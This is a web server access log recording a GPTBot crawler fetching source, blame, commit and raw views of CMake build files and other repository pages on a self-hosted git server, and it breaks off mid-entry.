"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:45:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10522] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:45:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10523] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10008] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10086] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10524] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10094] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13297] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11182] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14028] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug%2fnet8.0%2fOpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 22159] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[17/Feb/2026:16:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?state=closed" [Client 74.7.227.38] [Length 8470] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones" -[17/Feb/2026:16:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10602] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:16:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?state=all" [Client 74.7.227.38] [Length 8474] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones" -[17/Feb/2026:16:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main" -[17/Feb/2026:16:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main" -[17/Feb/2026:16:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main" -[17/Feb/2026:16:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main" -[17/Feb/2026:16:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14029] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10093] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?state=open" [Client 74.7.227.38] [Length 8457] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?state=closed" -[17/Feb/2026:16:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10219] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11047] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15175] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10881] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main" -[17/Feb/2026:16:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2flocalpycs%2fpyimod02_importers.pyc" [Client 74.7.227.38] [Length 23814] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:16:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2flocalpycs%2fpyimod02_importers.pyc" [Client 74.7.227.38] [Length 23828] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:16:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2flocalpycs%2fpyimod02_importers.pyc" [Client 74.7.227.38] [Length 23815] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:16:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/types.ts?display=source" [Client 74.7.227.38] [Length 11717] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/types.ts" -[17/Feb/2026:16:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=mostcomplete&state=closed" [Client 74.7.227.38] [Length 8514] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=mostcomplete&state=open" -[17/Feb/2026:16:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=leastcomplete&state=closed" [Client 74.7.227.38] [Length 8509] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=leastcomplete&state=open" -[17/Feb/2026:16:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21641] [Gzip 28.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9980] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:45:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16827] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:45:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr 